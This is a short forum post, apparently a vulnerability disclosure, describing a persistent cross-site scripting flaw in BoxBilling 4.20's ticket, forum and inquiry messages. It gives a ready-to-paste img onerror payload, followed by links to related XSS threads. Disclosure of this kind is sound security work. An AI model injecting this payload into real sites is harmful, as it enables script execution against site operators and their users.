[PoC] BoxBilling - Persistent XSS
Software: BoxBilling
Product Webpage: www.boxbilling.com
Version: 4.20
Issue: Persistent XSS (Cross-Site Scripting)

This issue affect's all of the three - Tickets, Forum, and Inquiries.

Simply just post this in the message (and not the title): <img style="" src="x" onerror="prompt(/@XSS/);">

[Image: uWzWi0w.png]

Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 1,009 06-16-2020, 11:51 AM
Last Post: LaZr4us
  POC for XML-PRC ? h3x0r 1 6,457 05-20-2019, 01:11 PM
Last Post: Insider
  Guide to XSS (Examples included) NO-OP 3 13,246 04-29-2019, 12:44 PM
Last Post: mhiats37
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 6,230 04-24-2019, 08:47 PM
Last Post: thunder